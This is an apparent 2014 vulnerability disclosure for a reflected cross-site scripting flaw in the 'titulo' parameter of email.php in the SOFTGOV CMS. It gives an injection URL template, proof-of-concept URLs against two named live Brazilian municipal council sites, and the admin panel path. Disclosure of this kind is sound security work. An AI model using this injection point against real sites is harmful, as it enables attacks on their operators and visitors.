[+] Cross Site Scripting on CMS SOFTGOV [+] Date: 23/04/2014 [+] Risk: LOW [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://www.softgov.com.br/sg/ [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Vulnerable File: email.php [+] Exploit : http://host/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=[XSS] [+] PoC : http://www.camarariopardo.rs.gov.br/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=Felipe Andrian Peixoto http://www.camarauruana.go.gov.br/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=Felipe Andrian Peixoto [+] Admin Page: http://host/painel